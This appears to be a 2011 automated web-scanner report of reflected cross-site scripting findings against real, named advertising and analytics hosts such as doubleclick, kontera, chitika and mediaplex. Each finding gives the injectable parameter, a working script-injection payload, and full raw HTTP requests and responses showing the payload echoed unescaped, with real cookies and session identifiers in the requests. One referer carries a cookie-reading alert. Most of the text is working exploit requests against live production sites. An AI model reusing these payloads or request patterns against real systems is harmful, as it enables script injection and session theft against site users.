HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 431 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Sun, 20 Mar 2011 17:28:41 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 19 Apr 2011 17:28:41 GMT; Path=/ Set-Cookie: di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1300642121.1FE|1300642121.60|1299801259.19A|1300446510.66; Domain=.addthis.com; Expires=Tue, 19-Mar-2013 17:28:23 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Sun, 20 Mar 2011 17:28:41 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 20 Mar 2011 17:28:41 GMT Connection: close
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 2d5be<script>alert(1)</script>fce206d5d8a was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fad_type%3Diframe%26ad_size%3D160x600%26section%3D674716%26bur%3D93455%26x%3Dhttp%3A%2F%2Fwww.burstnet.com%2Fads%2Fad16597a-map.cgi%2FBCPG175405.254264.267318%2FVTS%3D2RFlO.3dTL%2FK%3DADS_T150%2FSZ%3D120X600A%7C160X600A%2FV%3D2.3S%2F%2FREDIRURL%3D&uid=0xIawmmrsYYagWK1_67725292d5be<script>alert(1)</script>fce206d5d8a&xy=0%2C0&wh=160%2C600&vchannel=191678&cid=EMB&cookieenabled=1&screenwh=1920%2C1200&adwh=160%2C600&colordepth=16&flash=10.2&iframed=1 HTTP/1.1 Host: event.adxpose.com Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?n3caAJxLCgAxV2cAAAAAAFbVDwAAAAAAAAAQAAoAAAAAABAAAQABDdL2EQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD2TgUAAAAAAAIAAQAAAAAAAAAAAAAA-D8AAAAAAAD4PwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACU5zluMBzPCfyPAYJZwS-weB2tSCNbGpLI1FFnAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad16597a-map.cgi%2FBCPG175405.254264.267318%2FVTS%3D2RFlO.3dTL%2FK%3DADS_T150%2FSZ%3D120X600A%7C160X600A%2FV%3D2.3S%2F%2FREDIRURL%3D,http%3A%2F%2Ftechie-buzz.com%2F%3Fref%3Dlogo,Z%3D160x600%26bur%3D93455%26s%3D674716%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad16597a%252dmap.cgi%252fBCPG175405.254264.267318%252fVTS%253d2RFlO.3dTL%252fK%253dADS%255fT150%252fSZ%253d120X600A%257c160X600A%252fV%253d2.3S%252f%252fREDIRURL%253d%26_salt%3D4137244318%26B%3D10%26u%3Dhttp%253A%252F%252Ftechie-buzz.com%252F%253Fref%253Dlogo%26r%3D0,8bf33f3c-5316-11e0-841b-003048d6d1c8 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=69a5d959-2383-46d3-a91e-54766c81e851
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=ADE026FF19346D77021B5BFFB8432B42; Path=/ Cache-Control: no-store Content-Type: text/javascript;charset=UTF-8 Content-Length: 146 Date: Sun, 20 Mar 2011 17:26:49 GMT Connection: close
if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("0xIawmmrsYYagWK1_67725292d5be<script>alert(1)</script>fce206d5d8a");
The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ad4e"><script>alert(1)</script>488b49970ed was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/707/52222/44909_GEN09Products1_ebay_300x250.html?mpck=rover.ebay.com%2Frover%2F1%2F707-52222-2108-51%2F4%3Fmpt%3Dcrqigfg%252CbgymsbjuNlcq%26siteid%3D77%26adid%3D275241%26fcid%3D275241%26so_ustat%3D3%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D91847a4012e0a0aa12f4d964fff8a6ae4f62549c%26ir_DAP_I5%3D1%26ir_DAP_I6%3D77%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26rvr_id%3D2194300057065ad4e"><script>alert(1)</script>488b49970ed&mpt=crqigfg%2CbgymsbjuNlcq&siteid=77&adid=275241&fcid=275241&so_ustat=3&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=91847a4012e0a0aa12f4d964fff8a6ae4f62549c&ir_DAP_I5=1&ir_DAP_I6=77&ir_DAP_I129=&ir_DAP_I130=&rvr_id=219430005706&mpvc=http%3A%2F%2Fadclient.uimserv.net%2Fevent.ng%2FType%3Dclick%26FlightID%3D271125%26AdID%3D690074%26TargetID%3D103547%26RawValues%3DSECTIONID%2Cgmx%2Fhomepage%2Fstart%2Fde%2F%26Redirect%3D HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.gmx.net/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=879590159695; mojo3=1551:23636/10433:1629/3484:15222/15154:34833/12309:28674/14559:6676/12124:245/12896:1389/14302:28901/15017:13113/12525:37966/14960:18534
Response
HTTP/1.1 200 OK Date: Sun, 20 Mar 2011 18:55:16 GMT Server: Apache Last-Modified: Wed, 06 Oct 2010 16:21:19 GMT ETag: "690fd5-beb-491f52add3dc0" Accept-Ranges: bytes Content-Length: 6563 Content-Type: text/html; charset=ISO-8859-1
The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d4fd"><script>alert(1)</script>d088635f3c3 was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/707/52222/44909_GEN09Products1_ebay_300x250.html?mpck=rover.ebay.com%2Frover%2F1%2F707-52222-2108-51%2F4%3Fmpt%3Dcrqigfg%252CbgymsbjuNlcq%26siteid%3D77%26adid%3D275241%26fcid%3D275241%26so_ustat%3D3%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D91847a4012e0a0aa12f4d964fff8a6ae4f62549c%26ir_DAP_I5%3D1%26ir_DAP_I6%3D77%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26rvr_id%3D219430005706&mpt=crqigfg%2CbgymsbjuNlcq&siteid=77&adid=275241&fcid=275241&so_ustat=3&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=91847a4012e0a0aa12f4d964fff8a6ae4f62549c&ir_DAP_I5=1&ir_DAP_I6=77&ir_DAP_I129=&ir_DAP_I130=&rvr_id=219430005706&mpvc=http%3A%2F%2Fadclient.uimserv.net%2Fevent.ng%2FType%3Dclick%26FlightID%3D271125%26AdID%3D690074%26TargetID%3D103547%26RawValues%3DSECTIONID%2Cgmx%2Fhomepage%2Fstart%2Fde%2F%26Redirect%3D6d4fd"><script>alert(1)</script>d088635f3c3 HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.gmx.net/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=879590159695; mojo3=1551:23636/10433:1629/3484:15222/15154:34833/12309:28674/14559:6676/12124:245/12896:1389/14302:28901/15017:13113/12525:37966/14960:18534
Response
HTTP/1.1 200 OK Date: Sun, 20 Mar 2011 18:55:19 GMT Server: Apache Last-Modified: Wed, 06 Oct 2010 16:21:19 GMT ETag: "690fd5-beb-491f52add3dc0" Accept-Ranges: bytes Content-Length: 6563 Content-Type: text/html; charset=ISO-8859-1
The value of the clicktrack request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a145"-alert(1)-"eb438864c80 was submitted in the clicktrack parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
4.71. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imp.fetchback.com
Path:
/serve/fb/adtag.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7926c"-alert(1)-"bc07814a48d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the tid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bac5d"-alert(1)-"7750f188b5b was submitted in the tid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 546e5"-alert(1)-"3426b7f0737 was submitted in the type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7525"%3balert(1)//8c4da4b1adb was submitted in the l parameter. This input was echoed as e7525";alert(1)//8c4da4b1adb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /KonaGet.js?u=1300642173003&p=13764&k=http%3A//techie-buzz.com/%3Fref%3Dlogo%265476f%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Eb8b3b23ea0%3D1jpNNP3&al=1&l=http%3A//techie-buzz.com/%3Fref%3Dlogo%265476f%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Eb8b3b23ea0%3D1e7525"%3balert(1)//8c4da4b1adb&t=Techie+Buzz+%2C+know+your+technology+head+on&m1=technology+%2C+how+to+%2C+tips+and+tricks+%2C+software+news+%2C+software+reviews+%2C+twitter+%2C+firefox+%2C+tech+news+%2C+t&rId=0&prev_page=http%3A//burp/show/9&rl=0&1=14&mod=536936467&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_ HTTP/1.1 Host: kona40.kontera.com Proxy-Connection: keep-alive Referer: http://techie-buzz.com/?ref=logo&5476f%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb8b3b23ea0=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: KONA_USER_GUID=8564E29E-394C-11E0-9E36-00163E201081; cluid=21105147031300549481034; imprs=1
Response
HTTP/1.1 200 OK Content-Type: text/plain Connection: close Content-Length: 15796
The value of the rId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3dd26"-alert(1)-"038d1a01eb3 was submitted in the rId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /KonaGet.js?u=1300642173003&p=13764&k=http%3A//techie-buzz.com/%3Fref%3Dlogo%265476f%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Eb8b3b23ea0%3D1jpNNP3&al=1&l=http%3A//techie-buzz.com/%3Fref%3Dlogo%265476f%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Eb8b3b23ea0%3D1&t=Techie+Buzz+%2C+know+your+technology+head+on&m1=technology+%2C+how+to+%2C+tips+and+tricks+%2C+software+news+%2C+software+reviews+%2C+twitter+%2C+firefox+%2C+tech+news+%2C+t&rId=03dd26"-alert(1)-"038d1a01eb3&prev_page=http%3A//burp/show/9&rl=0&1=14&mod=536936467&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_ HTTP/1.1 Host: kona40.kontera.com Proxy-Connection: keep-alive Referer: http://techie-buzz.com/?ref=logo&5476f%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb8b3b23ea0=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: KONA_USER_GUID=8564E29E-394C-11E0-9E36-00163E201081; cluid=21105147031300549481034; imprs=1
Response
HTTP/1.1 200 OK Content-Type: text/plain Connection: close Content-Length: 23248
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed95a"%3balert(1)//a0710f25a4a was submitted in the l parameter. This input was echoed as ed95a";alert(1)//a0710f25a4a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /KonaGet.js?u=1300641701477&p=13764&k=http%3A//techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.htmljpNNP3&al=1&l=http%3A//techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.htmled95a"%3balert(1)//a0710f25a4a&t=How+To+Check+PageRank+in+Google+Chrome+%3F&m1=google+chrome+%2C+software&rId=67764811449365425&rl=0&i=14&n=0&dc_aff_id=&cl=0&mp=0&rm=1&mod=8454171&rt=0&st=10&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_&1300641702329 HTTP/1.1 Host: kona5.kontera.com Proxy-Connection: keep-alive Referer: http://techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: KONA_USER_GUID=8564E29E-394C-11E0-9E36-00163E201081; cluid=21105147031300549481034; imprs=1
Response
HTTP/1.1 200 OK Content-Type: text/plain Connection: close Content-Length: 5375
The value of the rId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3f64"-alert(1)-"ece18e1998 was submitted in the rId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /KonaGet.js?u=1300641701477&p=13764&k=http%3A//techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.htmljpNNP3&al=1&l=http%3A//techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.html&t=How+To+Check+PageRank+in+Google+Chrome+%3F&m1=google+chrome+%2C+software&rId=67764811449365425e3f64"-alert(1)-"ece18e1998&rl=0&i=14&n=0&dc_aff_id=&cl=0&mp=0&rm=1&mod=8454171&rt=0&st=10&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_&1300641702329 HTTP/1.1 Host: kona5.kontera.com Proxy-Connection: keep-alive Referer: http://techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: KONA_USER_GUID=8564E29E-394C-11E0-9E36-00163E201081; cluid=21105147031300549481034; imprs=1
Response
HTTP/1.1 200 OK Content-Type: text/plain Connection: close Content-Length: 4982
The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload cb83f%3balert(1)//85d66a58941 was submitted in the callback parameter. This input was echoed as cb83f;alert(1)//85d66a58941 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /minimall?w=728&h=90&client=chr&noctxt=4&sid=ban0dt&url=http%3A//dnstree.com/cx/xss/&query=cx/xss/&type=mpu&noborders=1&vertical=premium&alturl=http%3A//www.robtex.com/ext/ads/buchban&screenres=1920x1200&winsize=1112x916&canvas=1096x139&frm=false&history=1&impsrc=amm&cb=490&loc=188,143&snip_title=xss.cx&output=simplejs&callback=ch_ad_render_searchcb83f%3balert(1)//85d66a58941 HTTP/1.1 Host: mm.chitika.net Proxy-Connection: keep-alive Referer: http://dnstree.com/cx/xss/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: _cc=G/T85aQFoxB5939xhbwl+fD5hqWHYiCDbsDoTXiR7ghSSzFFqdkU6Ts8PN6LVdXA/7iSZXkL3XrgB9l9JAOZiPqF8KNw0jcJuzwnJ0NIVEts/AqvVXilg0aMVLxlBsr+syPvxNzXhB8Vi7qmCVPxNmekgCFp1dMafdeK8spGTWGzkRHU/W5O+G4k7JzRFd/0OOaCgztDFpGKCxZevA+jfM5EuGLu2Y29TlSe8PNFIHqWyl3cgKSBpgFob5hd8PJ0R/trAT1/JQSxLE6xVTTLwmMI684nd0shAmwLc1URONFbAFxm/PSCq7jShumiqMCNOoTJOM6Yspn8MxPkLMiQp+rNkiTN8AmRfq81fz/RyGmK9ABR7A3c0bkE+VHoCMp2pLYpP/q3YQG7/pU3y36HadhUF3RLx6b7.L80PgQYJuaF/eIHiHHkHjw.4
Response
HTTP/1.1 200 OK Date: Sun, 20 Mar 2011 17:38:15 GMT Server: Apache P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _cc=; path=/; domain=.chitika.net; expires=Sun Mar 20 17:38:15 2011 GMT Set-Cookie: _cc=G/T0JjQk4hB9jgs/945Ie6ysuV2X6f1GrfGOHdAxHI3zqTuXgjz7bM7/T1WXxPf8Ww6nIcY40W3r/PZAPRtqT4kEWbw27AHuu7eesHE0zKA98aOz5KQgDOyXOQEOjeWydOBJhsv6+vvr2PgbU8P+6Onw2b5AFsWyr/dILE5iqQ+XgBOmNNiNXxbatocesUOeKotJCDOmQRvOPcwhfoItSntAauhGcRgzz5cKKFlTXqLHI0quCs8qK1ki+9479aQ2ySQnizMiTh+du10BiijDbTJK5o8yY/8DDXR/W5G8cWL1ofV+qx1vS+PJQboaDBQKvACKxxbF14jj86gkVcBp5uKfNjSA3fuH9p9BDEgvtWdbBDt7xotEZ5/WPerpDfoABM/4XZf9K1EgN/XBJrFfwQKSTDwWR8ZrakO09jevybpx154pt/ZowYHFhetY1hGR9F2JUZa7kiyygmrFQNDx.1U6UitWY/IGwylOoVpo0nA.4; path=/; domain=.mm.chitika.net; expires=Mon Mar 19 17:38:15 2012 GMT Vary: Accept-Encoding Connection: close Content-Type: application/x-javascript; charset=utf-8 Content-Length: 174
var ch_mmhtml = {"pixelhtml":"","reason":"no_items","alturl":"http://www.robtex.com/ext/ads/buchban","output":"","cb":"490"};ch_ad_render_searchcb83f;alert(1)//85d66a58941();
The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 773a1%0aalert(1)//6693e3626f3 was submitted in the url parameter. This input was echoed as 773a1 alert(1)//6693e3626f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gadgets/ifr?url=http://fcgadgets.appspot.com/spec/shareit.xml773a1%0aalert(1)//6693e3626f3&container=peoplesense&parent=http://saratogaindecline.blogspot.com/&mid=0&view=profile&libs=google.blog&d=0.556.7&lang=en&view-params=%7B%22skin%22:%7B%22FACE_SIZE%22:%2232%22,%22HEIGHT%22:%22200%22,%22TITLE%22:%22Share+it%22,%22BORDER_COLOR%22:%22transparent%22,%22ENDCAP_BG_COLOR%22:%22transparent%22,%22ENDCAP_TEXT_COLOR%22:%22%23999999%22,%22ENDCAP_LINK_COLOR%22:%22%2399aadd%22,%22ALTERNATE_BG_COLOR%22:%22transparent%22,%22CONTENT_BG_COLOR%22:%22transparent%22,%22CONTENT_LINK_COLOR%22:%22%2399aadd%22,%22CONTENT_TEXT_COLOR%22:%22%23999999%22,%22CONTENT_SECONDARY_LINK_COLOR%22:%22%2399aadd%22,%22CONTENT_SECONDARY_TEXT_COLOR%22:%22%23777777%22,%22CONTENT_HEADLINE_COLOR%22:%22%23aadd99%22,%22FONT_FACE%22:%22normal+normal+100%25+'Trebuchet+MS',Trebuchet,Verdana,Sans-serif%22%7D%7D&communityId=05889504503058521941&caller=http://saratogaindecline.blogspot.com/2011/02/transparency-and-nxivm.html HTTP/1.1 Host: ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 9ee5e<script>alert(1)</script>a73b3542d36 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sun, 20 Mar 2011 17:29:34 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html Content-Length: 1155
<html> <head> <title>Check PageRank For Your Website</title> <meta name="description" content="Checks PageRank for any given website or URL. This PageRank Checker is part of Techie Buzz tool ...[SNIP]... <b style="font-family:Verdana;font-size:11px">Page Rank for http://xss.cx/9ee5e<script>alert(1)</script>a73b3542d36 is 0 <img src="http://pagerank.techie-buzz.com/images/page-rank-0.gif" border="0" /> ...[SNIP]...
The value of the page_slots request parameter is copied into the HTML document as plain text between tags. The payload 49dc7<script>alert(1)</script>875f71569ea was submitted in the page_slots parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gampad/ads?correlator=1300641662876&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=ss&client=ca-pub-2703385610225771&page_slots=menu_links%2C336x280_above_post%2C336_below_post%2C160_600_sidebar_2%2C160_600_sidebar%2C300_sidebar_1%2C300_sidebar_3%2C728_above_footer%2Cin_links%2C728x90_top_banner49dc7<script>alert(1)</script>875f71569ea&cookie_enabled=1&ga_vid=26217198.1300641665&ga_sid=1300641665&ga_hid=473153756&url=http%3A%2F%2Ftechie-buzz.com%2Fsoftwares%2Fhow-to-check-pagerank-in-google-chrome.html&lmt=1300658136&dt=1300641664864&cc=16&biw=1112&bih=916&ifi=1&adk=0&u_tz=-300&u_his=1&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.2.154 HTTP/1.1 Host: pubads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TMedia=Coun%3ANA/Postal%3ANA/; TMediaISP=SoftLayer%20Technologies; id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __utmz=251550727.1300542524.1.1.utmcsr=mgid.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=251550727.1167224488.1300542524.1300542524.1300542524.1; L2676=1.1300710919721
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sun, 20 Mar 2011 17:25:54 GMT Server: gfp-be Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 28644
GA_googleSetAdContentsBySlotForSync({"336x280_above_post":{"_type_":"html","_expandable_":false,"_html_":"\x3chtml\x3e\x3chead\x3e\x3cstyle\x3e\x3c!--\na:link { color: #000000 }a:visited { color: #000 ...[SNIP]... .com/pagead/sma8.js\"\x3e\x3c/script\x3e\x3c/body\x3e\x3c/html\x3e","_snippet_":false,"_height_":280,"_width_":336,"_empty_":false,"_is_afc_":true,"_is_psa_":false,"_is_3pas_":false},"728x90_top_banner49dc7<script>alert(1)</script>875f71569ea":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#0 ...[SNIP]...
The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload 5c027<script>alert(1)</script>d2c9d934be8 was submitted in the slotname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gampad/ads?correlator=1300632431167&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-6213915329796065&slotname=ServerInsiders-TopMost-AdUnit5c027<script>alert(1)</script>d2c9d934be8&page_slots=ServerInsiders-TopMost-AdUnit&cookie_enabled=1&ga_vid=1590812208.1300632431&ga_sid=1300632431&ga_hid=38308170&url=http%3A%2F%2Fserverinsiders.com%2Fisp%2Fsophidea-inc.html&lmt=1286371390&dt=1300632431168&cc=6&biw=1112&bih=916&ifi=1&adk=2135164243&u_tz=-300&u_his=1&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.2.154 HTTP/1.1 Host: pubads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://serverinsiders.com/isp/sophidea-inc.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TMedia=Coun%3ANA/Postal%3ANA/; TMediaISP=SoftLayer%20Technologies; id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __utmz=251550727.1300542524.1.1.utmcsr=mgid.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=251550727.1167224488.1300542524.1300542524.1300542524.1; L2676=1.1300710919721
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sun, 20 Mar 2011 14:48:33 GMT Server: gfp-be Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 2769
